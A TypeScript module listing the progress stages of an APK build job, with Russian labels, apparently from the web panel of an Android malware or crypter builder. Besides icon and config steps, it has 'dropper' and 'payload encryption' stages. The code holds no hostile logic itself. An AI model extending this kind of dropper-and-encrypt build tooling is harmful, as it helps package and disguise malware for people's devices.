export interface BuildStageItem {
	id: string;
	label: string;
}

const BASE_STAGES: BuildStageItem[] = [
	{ id: 'workspace', label: 'Подготовка' },
	{ id: 'icon', label: 'Иконка' },
	{ id: 'config', label: 'Конфиг' },
	{ id: 'gradle', label: 'Сборка APK' },
];

const OMAD_TAIL: BuildStageItem[] = [
	{ id: 'dropper', label: 'Дроппер' },
	{ id: 'encrypt', label: 'Шифрование' },
];

const OMAD_PAYLOAD_ENCRYPT_TAIL: BuildStageItem[] = [
	{ id: 'payload_encrypt', label: 'Шифрование payload' },
	...OMAD_TAIL,
];

const OMAD_DROPPER_ONLY_TAIL: BuildStageItem[] = [{ id: 'dropper', label: 'Дроппер' }];

const SMARTBIN_TAIL: BuildStageItem[] = [{ id: 'encrypt', label: 'Шифрование и дроппер' }];

export function usesOmadDropperStages(
	sawDropperStage: boolean,
	currentStage?: string | null,
	sawPayloadEncryptStage = false,
): boolean {
	return (
		sawDropperStage ||
		sawPayloadEncryptStage ||
		currentStage === 'dropper' ||
		currentStage === 'payload_encrypt'
	);
}

export function resolveBuildStages(
	sawDropperStage: boolean,
	currentStage?: string | null,
	skipEncrypt?: boolean,
	sawPayloadEncryptStage = false,
): BuildStageItem[] {
	const omadFlow = usesOmadDropperStages(sawDropperStage, currentStage, sawPayloadEncryptStage);
	if (omadFlow) {
		if (skipEncrypt) {
			return [...BASE_STAGES, ...OMAD_DROPPER_ONLY_TAIL];
		}
		const payloadEncrypt =
			sawPayloadEncryptStage || currentStage === 'payload_encrypt';
		const tail = payloadEncrypt ? OMAD_PAYLOAD_ENCRYPT_TAIL : OMAD_TAIL;
		return [...BASE_STAGES, ...tail];
	}
	return [...BASE_STAGES, ...SMARTBIN_TAIL];
}

export function getBuildStageIndex(stages: BuildStageItem[], stage: string | null | undefined): number {
	if (!stage || stage === 'queued') return -1;
	return stages.findIndex(item => item.id === stage);
}
